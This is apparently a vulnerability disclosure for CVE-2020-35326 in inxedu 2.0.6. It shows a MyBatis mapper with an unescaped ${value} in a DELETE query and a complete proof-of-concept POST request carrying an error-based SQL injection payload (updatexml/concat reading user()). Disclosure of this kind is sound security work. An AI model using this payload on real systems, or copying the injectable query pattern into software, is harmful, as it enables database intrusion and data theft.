Headline
CVE-2020-35326: SQL Injection-2 · Issue #I14DNJ · 因酷/inxedu - Gitee.com
SQL Injection vulnerability in file /inxedu/demo_inxedu_open/src/main/resources/mybatis/inxedu/website/WebsiteImagesMapper.xml in inxedu 2.0.6 via the id value.
/inxedu/demo_inxedu_open/src/main/resources/mybatis/inxedu/website/WebsiteImagesMapper.xml
<!-- 删除广告图片 -->
<delete id="deleteImages" parameterType="java.lang.String">
DELETE FROM EDU_WEBSITE_IMAGES WHERE IMAGE_ID IN(${value})
</delete>
POST /admin/website/delImages HTTP/1.1
Host: 127.0.0.1:82
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: http://127.0.0.1:82
Connection: close
Referer: http://127.0.0.1:82/admin/website/imagesPage
Cookie: admin-token=; JSESSIONID=51DA0B24124A0158F5809EEDD2F7F1E2; inxedulogin_sys_user_=inxedulogin_sys_user_1
Upgrade-Insecure-Requests: 1
imageId=320) or updatexml(1,concat(0x7e,(user())),0) #